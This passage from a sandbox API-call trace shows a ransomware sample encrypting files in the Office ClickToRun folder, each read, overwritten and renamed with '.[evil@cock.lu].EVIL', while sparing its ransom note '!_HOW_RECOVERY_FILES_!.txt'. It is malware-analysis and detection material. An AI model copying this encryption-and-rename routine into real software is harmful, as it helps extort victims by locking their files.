_ShFlag=64) returned 0x7ffc020ee2a0 [0082.085] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0082.086] __uncaught_exception () returned 0x84b1160800 [0082.086] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0082.106] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems32.dll"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems32.dll.[evil@cock.lu].evil")) returned 1 [0082.106] ??_V@YAXPEAX@Z () returned 0x1 [0082.109] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll", dwFileAttributes=0x0) returned 0 [0082.109] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0082.109] wcsstr (_Str="AppvIsvSubsystems64.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0082.109] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll") returned 82 [0082.109] wcscmp (_String1="AppvIsvSubsystems64.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0082.109] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AppvIsvSubsystems64.dll") returned 0x0 [0082.109] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll") returned 0x52 [0082.109] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems64.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0082.111] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x100000, lpOverlapped=0x0) returned 1 [0082.206] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0082.206] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0082.206] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0082.206] _errno () returned 0x84b1160840 [0082.207] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.207] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x100020, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x100020, lpOverlapped=0x0) returned 1 [0082.226] CloseHandle (hObject=0x1a4) returned 1 [0082.292] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0082.292] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0082.292] __uncaught_exception () returned 0x84b1160800 [0082.292] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0082.325] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems64.dll"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems64.dll.[evil@cock.lu].evil")) returned 1 [0082.325] ??_V@YAXPEAX@Z () returned 0x1 [0082.328] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll", dwFileAttributes=0x0) returned 0 [0082.328] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0082.328] wcsstr (_Str="AppVIsvVirtualization.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0082.328] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvVirtualization.dll") returned 84 [0082.328] wcscmp (_String1="AppVIsvVirtualization.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0082.328] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AppVIsvVirtualization.dll") returned 0x0 [0082.328] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvVirtualization.dll") returned 0x54 [0082.328] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvVirtualization.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvvirtualization.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0082.329] GetLastError () returned 0x20 [0082.329] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0082.329] wcsstr (_Str="AppVManifest.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0082.329] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVManifest.dll") returned 75 [0082.329] wcscmp (_String1="AppVManifest.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0082.329] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AppVManifest.dll") returned 0x0 [0082.329] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVManifest.dll") returned 0x4b [0082.329] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVManifest.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvmanifest.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0082.329] GetLastError () returned 0x20 [0082.329] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0082.329] wcsstr (_Str="AppVOrchestration.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0082.329] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVOrchestration.dll") returned 80 [0082.329] wcscmp (_String1="AppVOrchestration.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0082.329] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AppVOrchestration.dll") returned 0x0 [0082.329] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVOrchestration.dll") returned 0x50 [0082.329] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVOrchestration.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvorchestration.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0082.329] GetLastError () returned 0x20 [0082.329] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0082.329] wcsstr (_Str="AppVPolicy.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0082.329] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll") returned 73 [0082.329] wcscmp (_String1="AppVPolicy.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0082.329] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AppVPolicy.dll") returned 0x0 [0082.329] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll") returned 0x49 [0082.329] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvpolicy.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0082.330] GetLastError () returned 0x20 [0082.330] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0082.330] wcsstr (_Str="AppVScripting.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0082.330] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVScripting.dll") returned 76 [0082.330] wcscmp (_String1="AppVScripting.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0082.330] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AppVScripting.dll") returned 0x0 [0082.330] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVScripting.dll") returned 0x4c [0082.330] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVScripting.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvscripting.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0082.332] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x7f530, lpOverlapped=0x0) returned 1 [0082.432] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0082.432] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0082.432] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0082.432] _errno () returned 0x84b1160840 [0082.433] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.433] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x7f540, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x7f540, lpOverlapped=0x0) returned 1 [0082.434] CloseHandle (hObject=0x1a4) returned 1 [0082.439] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVScripting.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0082.439] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0082.439] __uncaught_exception () returned 0x84b1160800 [0082.439] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0082.448] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVScripting.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvscripting.dll"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVScripting.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvscripting.dll.[evil@cock.lu].evil")) returned 1 [0082.449] ??_V@YAXPEAX@Z () returned 0x1 [0082.453] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVScripting.dll", dwFileAttributes=0x0) returned 0 [0082.453] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0082.453] wcsstr (_Str="AppVShNotify.exe", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0082.453] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVShNotify.exe") returned 75 [0082.453] wcscmp (_String1="AppVShNotify.exe", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0082.453] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AppVShNotify.exe") returned 0x0 [0082.453] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVShNotify.exe") returned 0x4b [0082.453] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVShNotify.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvshnotify.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0082.457] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x42b30, lpOverlapped=0x0) returned 1 [0082.640] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0082.640] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0082.640] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0082.640] _errno () returned 0x84b1160840 [0082.640] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.640] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x42b40, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x42b40, lpOverlapped=0x0) returned 1 [0082.641] CloseHandle (hObject=0x1a4) returned 1 [0082.645] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVShNotify.exe", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0082.645] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0082.645] __uncaught_exception () returned 0x84b1160800 [0082.645] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0082.648] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVShNotify.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvshnotify.exe"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVShNotify.exe.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvshnotify.exe.[evil@cock.lu].evil")) returned 1 [0082.649] ??_V@YAXPEAX@Z () returned 0x1 [0082.652] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVShNotify.exe", dwFileAttributes=0x0) returned 0 [0082.652] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0082.652] wcsstr (_Str="C2R32.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0082.652] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll") returned 68 [0082.652] wcscmp (_String1="C2R32.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0082.652] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="C2R32.dll") returned 0x0 [0082.652] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll") returned 0x44 [0082.652] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r32.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0082.654] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x100000, lpOverlapped=0x0) returned 1 [0082.751] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0082.751] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0082.751] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0082.751] _errno () returned 0x84b1160840 [0082.753] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.753] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x100020, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x100020, lpOverlapped=0x0) returned 1 [0082.905] CloseHandle (hObject=0x1a4) returned 1 [0082.924] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0082.925] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0082.925] __uncaught_exception () returned 0x84b1160800 [0082.925] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0082.943] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r32.dll"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r32.dll.[evil@cock.lu].evil")) returned 1 [0082.944] ??_V@YAXPEAX@Z () returned 0x1 [0082.947] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll", dwFileAttributes=0x0) returned 0 [0082.947] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0082.947] wcsstr (_Str="C2R64.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0082.947] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R64.dll") returned 68 [0082.947] wcscmp (_String1="C2R64.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0082.947] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="C2R64.dll") returned 0x0 [0082.947] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R64.dll") returned 0x44 [0082.947] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r64.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0082.949] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x100000, lpOverlapped=0x0) returned 1 [0083.063] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0083.063] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0083.063] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0083.063] _errno () returned 0x84b1160840 [0083.065] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.065] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x100020, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x100020, lpOverlapped=0x0) returned 1 [0083.089] CloseHandle (hObject=0x1a4) returned 1 [0083.117] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R64.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0083.118] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0083.118] __uncaught_exception () returned 0x84b1160800 [0083.118] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0083.139] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r64.dll"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R64.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r64.dll.[evil@cock.lu].evil")) returned 1 [0083.142] ??_V@YAXPEAX@Z () returned 0x1 [0083.147] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R64.dll", dwFileAttributes=0x0) returned 0 [0083.147] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0083.147] wcsstr (_Str="C2RHeartbeatConfig.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0083.147] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml") returned 81 [0083.147] wcscmp (_String1="C2RHeartbeatConfig.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0083.147] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="C2RHeartbeatConfig.xml") returned 0x0 [0083.147] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml") returned 0x51 [0083.147] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rheartbeatconfig.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0083.150] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x1028, lpOverlapped=0x0) returned 1 [0083.159] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0083.159] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0083.159] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0083.159] _errno () returned 0x84b1160840 [0083.160] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.160] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x1040, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x1040, lpOverlapped=0x0) returned 1 [0083.160] CloseHandle (hObject=0x1a4) returned 1 [0083.160] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0083.161] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0083.161] __uncaught_exception () returned 0x84b1160800 [0083.161] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0083.164] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rheartbeatconfig.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rheartbeatconfig.xml.[evil@cock.lu].evil")) returned 1 [0083.164] ??_V@YAXPEAX@Z () returned 0x1 [0083.168] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml", dwFileAttributes=0x0) returned 0 [0083.168] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0083.168] wcsstr (_Str="C2RUI.en-us.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0083.168] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RUI.en-us.dll") returned 74 [0083.168] wcscmp (_String1="C2RUI.en-us.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0083.168] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="C2RUI.en-us.dll") returned 0x0 [0083.168] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RUI.en-us.dll") returned 0x4a [0083.168] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RUI.en-us.dll" (normalized: "c:\\program files\\common 